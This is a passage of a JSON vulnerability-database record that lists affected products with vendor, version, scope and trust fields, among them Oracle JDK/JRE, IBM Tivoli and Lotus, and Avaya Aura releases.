"version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "freeflow print server 93.e0.21c", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 91.d2.32", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 82.d1.44", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 81.d0.73", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 73.d2.33", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 73.c5.11", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise java sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise java sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise desktop sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "trio tview software", "scope": "eq", "trust": 0.3, "vendor": "schneider electric", "version": "3.27.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.5" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.5" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "jrockit r28.2.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "websphere real time sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.0" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "virtualization engine ts7700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.33" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.32" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.29" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.104" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.203" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3.1" }, { "model": "tivoli monitoring fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli monitoring fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.24" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.13" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.12" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.11" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.5" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.4" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56009.7" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "os/400 v5r4m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.8" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.7" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.6" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.4" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "java sdk sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr5-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "java sdk sr13-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "java sdk sr13-fp17", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "i v5r4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87341.3" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87341.1.0" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87311.3" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87311.1.0" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79551.3" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79551.1.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "4.0" }, { "model": "cosminexus server web edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-4" }, { "model": "cosminexus server standard edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-4" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "9.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.3" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "voice portal sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ir", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r16.3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r16", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "cms r15", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": 